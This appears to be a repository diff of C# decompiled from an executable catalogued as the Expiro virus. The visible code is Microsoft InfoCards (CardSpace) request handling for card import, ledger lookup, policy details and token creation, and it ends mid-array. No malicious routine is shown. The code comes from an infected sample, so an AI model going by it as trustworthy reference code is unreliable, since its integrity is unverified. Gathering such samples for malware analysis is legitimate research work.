StoreConnection connection = StoreConnection.GetConnection();
try
{
InfoCardTrace.Assert(!string.IsNullOrEmpty(this.m_filename), "No file name provided for import");
InfoCardXmlSerializer cardXmlSerializer = new InfoCardXmlSerializer(connection);
cardXmlSerializer.CheckSignature = true;
cardXmlSerializer.Deserialize(this.m_filename);
this.m_card = cardXmlSerializer.Card;
this.m_card.IsImported = true;
this.m_card.InstalledOn = DateTime.Now;
X509Certificate2 issuer = cardXmlSerializer.Issuer;
if (issuer == null || this.m_card == null || !this.m_card.IsComplete())
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("InvalidImportFile")));
Recipient.RecipientCertParameters recipientParams;
string recipientIdHash = Recipient.CertGetRecipientIdHash(issuer, cardXmlSerializer.AdditionalIssuerCerts, cardXmlSerializer.IsIssuerChainTrusted, out recipientParams);
string organizationIdHash = Recipient.CertGetRecipientOrganizationIdHash(issuer, cardXmlSerializer.AdditionalIssuerCerts, cardXmlSerializer.IsIssuerChainTrusted);
this.ParentRequest.CertCacheAdd(recipientIdHash, issuer);
this.m_issuer = new Recipient(issuer, recipientIdHash, organizationIdHash, true, this.m_card.PrivacyPolicyVersion, recipientParams);
this.m_card.IssuerName = !this.m_issuer.IsOrganizationVerified() ? this.m_issuer.RecipientParameters.m_cn : this.m_issuer.RecipientParameters.m_organization;
this.m_policyLink = this.m_card.PrivacyPolicyLink;
DataRow singleRow = connection.GetSingleRow(QueryDetails.FullRow, new List<QueryParameter>()
{
new QueryParameter("ix_objecttype", new object[1]
{
(object) 1
}),
new QueryParameter("ix_globalid", new object[1]
{
(object) GlobalId.DeriveFrom(this.m_card.Id.ToString())
})
}.ToArray());
if (singleRow == null)
return;
using (MemoryStream memoryStream = new MemoryStream(singleRow.GetDataField()))
{
InfoCard card = new InfoCard((Stream) memoryStream);
this.m_matchFlag = (int) card.Epoch != (int) this.m_card.Epoch ? (card.Epoch >= this.m_card.Epoch ? GetImportedCardRequest.ImportCardMatchStatus.MatchNewerVersion : GetImportedCardRequest.ImportCardMatchStatus.MatchOlderVersion) : GetImportedCardRequest.ImportCardMatchStatus.MatchSameVersion;
this.m_card.CopyMetaData(card);
}
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
Stream outArgs = this.OutArgs;
if (this.m_card == null || this.m_issuer == null || !this.m_card.IsComplete())
return;
StoreConnection connection = StoreConnection.GetConnection();
try
{
this.m_card.AgentSerialize(outArgs, this.ParentRequest is GetTokenRequest, this.m_policy, connection, new CultureInfo(this.ParentRequest.UserLanguage));
BinaryWriter writer = new BinaryWriter(outArgs, Encoding.Unicode);
this.m_issuer.Serialize(writer);
Utility.SerializeString(writer, this.m_policyLink);
writer.Write((byte) this.m_matchFlag);
}
finally
{
connection.Close();
}
}
public enum ImportCardMatchStatus : byte
{
MatchNone,
MatchSameVersion,
MatchNewerVersion,
MatchOlderVersion,
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetIsBrowserClientRequest.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetIsBrowserClientRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetIsBrowserClientRequest : UIAgentRequest
{
public GetIsBrowserClientRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
}
protected override void OnMarshalOutArgs() => new BinaryWriter(this.OutArgs, Encoding.Unicode).Write(this.ParentRequest is GetBrowserTokenRequest);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetKeyedHashRequest.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetKeyedHashRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetKeyedHashRequest : ClientRequest
{
private int m_cryptoSession;
private HashCryptoSession m_hashSession;
public GetKeyedHashRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
}
protected override void OnMarshalInArgs()
{
this.m_cryptoSession = new InfoCardBinaryReader(this.InArgs, Encoding.Unicode).ReadInt32();
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
}
protected override void OnProcess() => this.m_hashSession = ((SymmetricCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).GetKeyedHash();
protected override void OnMarshalOutArgs()
{
BinaryWriter bwriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
this.m_hashSession.Write(bwriter);
bwriter.Flush();
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetLastErrorDetailsRequest.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetLastErrorDetailsRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetLastErrorDetailsRequest : UIAgentRequest
{
public GetLastErrorDetailsRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
}
protected override void OnMarshalOutArgs()
{
BinaryWriter binaryWriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
binaryWriter.Write(this.ParentRequest is GetBrowserTokenRequest);
int num = -1073413888;
Exception exception1 = this.ParentRequest.ProcessingException;
if (exception1 != null)
{
Exception exception2 = (Exception) null;
for (; exception1 is InfoCardBaseException; exception1 = exception1.InnerException)
{
exception2 = exception1;
if (exception1.InnerException == null)
break;
}
if (exception2 != null)
num = (exception2 as InfoCardBaseException).NativeHResult;
}
binaryWriter.Write(num);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetLedgerEntryForRecipientRequest.cs
+76
View File
@@ -0,0 +1,76 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetLedgerEntryForRecipientRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetLedgerEntryForRecipientRequest : UIAgentRequest
{
private Uri m_cardId;
private string m_recipientId;
private byte[] m_bytes;
public GetLedgerEntryForRecipientRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
InfoCardTrace.Assert(this.InArgs.Length > 0L, "The user preferences must be specified");
BinaryReader reader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
this.m_cardId = Utility.DeserializeUri(reader);
this.m_recipientId = Utility.DeserializeString(reader);
}
protected override void OnProcess()
{
InfoCardTrace.Assert((Uri) null != this.m_cardId, "The card Id must not be null");
InfoCardTrace.Assert(!string.IsNullOrEmpty(this.m_recipientId), "The thumbPrint must be specified");
List<QueryParameter> queryParameterList = new List<QueryParameter>();
queryParameterList.Add(new QueryParameter("ix_objecttype", new object[1]
{
(object) -1
}));
queryParameterList.Add(new QueryParameter("ix_parentid", new object[1]
{
(object) GlobalId.DeriveFrom(this.m_cardId.ToString())
}));
queryParameterList.Add(new QueryParameter("ix_name", new object[1]
{
(object) this.m_recipientId
}));
StoreConnection connection = StoreConnection.GetConnection();
try
{
DataRow singleRow = connection.GetSingleRow(queryParameterList.ToArray());
if (singleRow == null)
return;
this.m_bytes = singleRow.GetDataField();
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
if (this.m_bytes == null)
return;
this.OutArgs.Write(this.m_bytes, 0, this.m_bytes.Length);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetLedgerRequest.cs
+60
View File
@@ -0,0 +1,60 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetLedgerRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetLedgerRequest : UIAgentRequest
{
private Uri m_cardId;
private LedgerEntryCollection m_ledger;
public GetLedgerRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
InfoCardTrace.Assert(IntPtr.Zero != rpcHandle, "Null rpc handle");
InfoCardTrace.Assert(null != inArgs, "Null inArgs");
InfoCardTrace.Assert(null != outArgs, "Null out args");
}
protected override void OnInitializeAsSystem() => base.OnInitializeAsSystem();
protected override void OnMarshalInArgs()
{
InfoCardTrace.Assert(null != this.InArgs, "null request argument");
this.m_cardId = Utility.DeserializeUri((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
}
protected override void OnProcess()
{
InfoCardTrace.Assert((Uri) null != this.m_cardId, "No CardId passed to GetLedgerRequest");
StoreConnection connection = StoreConnection.GetConnection();
try
{
this.m_ledger = new LedgerEntryCollection(this.m_cardId);
this.m_ledger.Get(connection);
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
InfoCardTrace.Assert(null != this.m_ledger, "No ledger collection exists to be serialized");
this.m_ledger.Serialize(this.OutArgs);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetPolicyDetailsRequest.cs
+106
View File
@@ -0,0 +1,106 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetPolicyDetailsRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetPolicyDetailsRequest : UIAgentRequest
{
private InfoCardPolicy m_policy;
private Recipient m_recipient;
private string m_privacyPolicyLink = string.Empty;
public GetPolicyDetailsRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnInitializeAsSystem()
{
base.OnInitializeAsSystem();
this.m_policy = this.GetPolicy();
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
InfoCardTrace.Assert(null != this.m_policy, "Null policy");
StoreConnection connection = StoreConnection.GetConnection();
try
{
DataRow singleRow = connection.GetSingleRow(new List<QueryParameter>()
{
new QueryParameter("ix_objecttype", new object[1]
{
(object) -3
}),
new QueryParameter("ix_name", new object[1]
{
(object) this.m_policy.Recipient.GetIdentifier()
})
}.ToArray());
if (this.m_policy.Recipient is X509RecipientIdentity recipient)
this.ParentRequest.CertCacheAdd(this.m_policy.Recipient.GetIdentifier(), recipient.LeafCertificate);
if (singleRow != null)
{
this.m_recipient = new Recipient((Stream) new MemoryStream(singleRow.GetDataField()), this.m_policy.Recipient, true);
if (this.m_recipient.Trust == Recipient.TrustDecision.IsTrusted && (int) this.m_recipient.PrivacyPolicyVersion != (int) this.m_policy.PrivacyPolicyVersion)
this.m_recipient.Trust = Recipient.TrustDecision.PolicyVersionChange;
this.m_recipient.PrivacyPolicyVersion = this.m_policy.PrivacyPolicyVersion;
}
else
{
this.m_recipient = new Recipient(this.m_policy.Recipient, true, this.m_policy.PrivacyPolicyVersion);
this.m_recipient.Trust = Recipient.TrustDecision.NoTrustDecision;
}
this.m_privacyPolicyLink = this.m_policy.PrivacyPolicyLink;
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
InfoCardTrace.Assert(null != this.m_policy, "Null policy");
BinaryWriter writer = new BinaryWriter(this.OutArgs, Encoding.Unicode);
writer.Write(this.m_policy.RequiresManagedCard);
writer.Write(this.m_policy.RequiresSelfIssuedCard);
writer.Write(this.ParentRequest is GetBrowserTokenRequest);
this.m_recipient.Serialize(writer);
Utility.SerializeString(writer, this.m_privacyPolicyLink);
if (this.m_policy.RequiredClaims != null)
{
writer.Write(this.m_policy.RequiredClaims.Length);
for (int index = 0; index < this.m_policy.RequiredClaims.Length; ++index)
Utility.SerializeString(writer, this.m_policy.RequiredClaims[index]);
}
else
writer.Write(0);
if (this.m_policy.OptionalClaims != null)
{
writer.Write(this.m_policy.OptionalClaims.Length);
for (int index = 0; index < this.m_policy.OptionalClaims.Length; ++index)
Utility.SerializeString(writer, this.m_policy.OptionalClaims[index]);
}
else
writer.Write(0);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetRecipientListRequest.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetRecipientListRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetRecipientListRequest : UIAgentRequest
{
private IList<Recipient> m_recipientList;
public GetRecipientListRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
IList<DataRow> dataRowList = (IList<DataRow>) connection.Query(QueryDetails.FullRow, new QueryParameter("ix_objecttype", new object[1]
{
(object) -3
}));
if (dataRowList == null)
return;
IList<Recipient> recipientList = (IList<Recipient>) new List<Recipient>(dataRowList.Count);
foreach (DataRow dataRow in (IEnumerable<DataRow>) dataRowList)
recipientList.Add(new Recipient((Stream) new MemoryStream(dataRow.GetDataField())));
this.m_recipientList = recipientList;
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
BinaryWriter writer = new BinaryWriter(this.OutArgs, Encoding.Unicode);
uint num = 0;
if (this.m_recipientList != null)
{
uint count = (uint) this.m_recipientList.Count;
writer.Write(count);
foreach (Recipient recipient in (IEnumerable<Recipient>) this.m_recipientList)
recipient.Serialize(writer);
}
else
writer.Write(num);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetRecipientRequest.cs
+65
View File
@@ -0,0 +1,65 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetRecipientRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetRecipientRequest : UIAgentRequest
{
private string m_recipientId;
private Recipient m_recipient;
public GetRecipientRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs() => this.m_recipientId = Utility.DeserializeString((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
protected override void OnProcess()
{
InfoCardTrace.Assert(null != this.m_recipientId, "null thumb print");
StoreConnection connection = StoreConnection.GetConnection();
try
{
DataRow singleRow = connection.GetSingleRow(new List<QueryParameter>()
{
new QueryParameter("ix_objecttype", new object[1]
{
(object) -3
}),
new QueryParameter("ix_name", new object[1]
{
(object) this.m_recipientId
})
}.ToArray());
if (singleRow == null)
return;
this.m_recipient = new Recipient((Stream) new MemoryStream(singleRow.GetDataField()));
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
BinaryWriter writer = new BinaryWriter(this.OutArgs, Encoding.Unicode);
InfoCardTrace.Assert(null != this.m_recipient, "null recipient");
this.m_recipient.Serialize(writer);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetTokenRequest.cs
+258
View File
@@ -0,0 +1,258 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetTokenRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Security.Principal;
using System.ServiceModel.Description;
using System.Text;
using System.Threading;
namespace Microsoft.InfoCards
{
internal class GetTokenRequest : ClientUIRequest
{
private InfoCardPolicy[] m_policyChain;
private InfoCardPolicy m_policy;
private TokenDescriptor m_token;
private ITokenFactory m_tokenFactory;
private LedgerEntry m_ledgerEntry;
private InfoCard m_selectedCard;
private Recipient m_recipient;
private object m_createSecurityTokenDoneMonitor = new object();
private bool m_isProcessingComplete = true;
private bool m_userProceededToCreateToken;
public GetTokenRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
InfoCardUIAgent uiAgent,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, uiAgent, rpcHandle, inArgs, outArgs, InfoCardUIAgent.CallMode.GetToken, ExceptionList.AllNonFatal)
{
}
public TokenDescriptor Token => this.m_token;
public InfoCardPolicy Policy
{
get => this.m_policy;
protected set => this.m_policy = value;
}
protected Recipient GetRecipient()
{
if (this.m_recipient == null)
this.m_recipient = new Recipient(this.m_policy.Recipient, false, this.m_policy.PrivacyPolicyVersion);
return this.m_recipient;
}
protected override void OnMarshalInArgs()
{
BinaryReader reader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
int length = reader.ReadInt32();
this.m_policyChain = length > 0 && length <= 50 ? new InfoCardPolicy[length] : throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("InvalidPolicyLength")));
for (int index = 0; index < length; ++index)
{
string recipientXml = Utility.DeserializeString(reader);
string issuerXml = Utility.DeserializeString(reader);
string policyXml = Utility.DeserializeString(reader);
string privacyUrl = Utility.DeserializeString(reader);
uint privacyVersion = reader.ReadUInt32();
bool isManaged = reader.ReadBoolean();
this.m_policyChain[index] = PolicyFactory.CreatePolicyForGetTokenRequest(reader, recipientXml, issuerXml, policyXml, isManaged);
if (index == 0)
this.m_policyChain[index].SetRecipientInfo(this.m_policyChain[0].ImmediateTokenRecipient, privacyUrl, privacyVersion);
else
this.m_policyChain[index].SetRecipientInfo(this.m_policyChain[0].ImmediateTokenRecipient, this.m_policyChain[0].PrivacyPolicyLink, this.m_policyChain[0].PrivacyPolicyVersion);
}
int index1 = length - 1;
if (this.m_policyChain[index1].IsManaged)
{
if (index1 == 0)
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("InvalidPolicyLength")));
--index1;
}
this.m_policy = this.m_policyChain[index1];
this.m_policy.Validate();
}
protected override void OnProcess() => this.StartAndWaitForUIAgent();
protected override void OnMarshalOutArgs()
{
BinaryWriter bwriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
this.m_token.Write(bwriter);
SymmetricAlgorithm symmetricProof = this.m_token.SymmetricProof;
(symmetricProof != null ? CryptoSession.Create(this.CallerProcess, this.m_token.ExpirationTime, this.RequestorIdentity, symmetricProof.Key) : CryptoSession.Create(this.CallerProcess, this.m_token.ExpirationTime, this.RequestorIdentity, this.GetPrivateCryptography())).Write(bwriter);
}
protected RSACryptoServiceProvider GetPrivateCryptography() => this.m_selectedCard.GetPrivateCryptography(this.GetRecipient().RecipientId);
protected override void OnDisposeAsUser()
{
base.OnDisposeAsUser();
if (this.m_token == null)
return;
this.m_token.Dispose();
this.m_token = (TokenDescriptor) null;
}
public void CancelSelectCard()
{
this.m_userProceededToCreateToken = false;
this.m_isProcessingComplete = true;
}
public int SelectCard(InfoCard card, bool isSelfIssued)
{
lock (this.m_createSecurityTokenDoneMonitor)
{
while (this.m_userProceededToCreateToken && !this.m_isProcessingComplete)
Monitor.Wait(this.m_createSecurityTokenDoneMonitor);
this.m_userProceededToCreateToken = false;
this.m_isProcessingComplete = false;
int index1 = 0;
TokenCreationParameter parameter = (TokenCreationParameter) null;
ServiceEndpoint endPoint = (ServiceEndpoint) null;
IWebProxy proxy = (IWebProxy) null;
StoreConnection connection = StoreConnection.GetConnection();
try
{
card.Connection = connection;
if (!isSelfIssued)
{
if (1 == card.CreationParameters.Count)
{
index1 = 0;
parameter = card.CreationParameters[index1];
}
else
{
for (int index2 = 0; index2 < card.CreationParameters.Count; ++index2)
{
try
{
endPoint = RemoteTokenFactory.DoMexExchange(card.CreationParameters[index2], this.UserProxy);
index1 = index2;
parameter = card.CreationParameters[index1];
break;
}
catch (TrustExchangeException ex)
{
if (index2 == card.CreationParameters.Count - 1)
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("InvalidServiceUri")));
}
}
}
proxy = this.UserProxy;
}
}
finally
{
connection.Close();
}
this.m_tokenFactory = TokenFactoryFactory.Create(card, parameter, endPoint, proxy);
this.m_selectedCard = card;
return index1;
}
}
public void CancelCreateSecurityToken()
{
if (this.m_tokenFactory != null)
this.m_tokenFactory.Abort();
this.m_userProceededToCreateToken = true;
}
public DisplayToken CreateSecurityToken(
TokenFactoryCredential credential,
bool discloseOptional)
{
lock (this.m_createSecurityTokenDoneMonitor)
{
try
{
this.m_ledgerEntry = this.GetLedgerEntry();
if (this.m_token != null)
{
this.m_token.Dispose();
this.m_token = (TokenDescriptor) null;
}
using (credential)
this.m_token = this.m_tokenFactory.CreateToken(this.m_selectedCard, credential, this.m_policy, discloseOptional);
this.m_ledgerEntry.DisclosureDate = DateTime.UtcNow;
this.m_ledgerEntry.DisclosedClaims = new string[this.m_token.DisclosedClaims.Count];
for (int index = 0; index < this.m_token.DisclosedClaims.Count; ++index)
this.m_ledgerEntry.DisclosedClaims[index] = this.m_token.DisclosedClaims[index];
Array.Clear((Array) this.m_selectedCard.Key, 0, this.m_selectedCard.Key.Length);
return this.m_token.DisplayToken;
}
finally
{
this.m_isProcessingComplete = true;
this.m_userProceededToCreateToken = true;
Monitor.Pulse(this.m_createSecurityTokenDoneMonitor);
}
}
}
private LedgerEntry GetLedgerEntry()
{
LedgerEntry entry = (LedgerEntry) null;
StoreConnection connection = StoreConnection.GetConnection();
try
{
entry = this.m_selectedCard.TryGetLedgerEntry(connection, this.m_policy.Recipient.GetIdentifier());
if (entry == null)
entry = this.m_selectedCard.CreateLedgerEntry(this.GetRecipient(), this.m_policy.ImmediateTokenRecipient.GetOrganizationIdentifier());
else
this.m_selectedCard.CheckAndUpdateLedgerEntry(entry, this.m_policy.ImmediateTokenRecipient.GetOrganizationIdentifier());
}
finally
{
connection.Close();
}
return entry;
}
public void SaveLedgerEntry()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
connection.BeginTransaction();
try
{
this.m_ledgerEntry.Save(connection);
connection.CommitTransaction();
}
catch
{
connection.RollbackTransaction();
throw;
}
}
finally
{
connection.Close();
}
}
public enum TrustDecision : byte
{
NoTrustDecision,
IsTrusted,
IsNotTrusted,
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetUserPreferenceRequest.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetUserPreferenceRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class GetUserPreferenceRequest : UIAgentRequest
{
private UserPreference m_userPreference;
public GetUserPreferenceRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
this.m_userPreference = (UserPreference) null;
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
this.m_userPreference = UserPreference.Get(connection);
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
if (this.m_userPreference == null)
return;
this.m_userPreference.Serialize(this.OutArgs);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GlobalId.cs
+120
View File
@@ -0,0 +1,120 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GlobalId
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Globalization;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace Microsoft.InfoCards
{
[StructLayout(LayoutKind.Explicit, Size = 16)]
internal struct GlobalId
{
public const int StructSize = 16;
public static readonly GlobalId Empty = (GlobalId) Guid.Empty;
private static readonly byte[] HASHPREFIX = new byte[16]
{
(byte) 126,
(byte) 85,
(byte) 219,
(byte) 17,
(byte) 52,
(byte) 221,
(byte) 70,
(byte) 150,
(byte) 168,
(byte) 123,
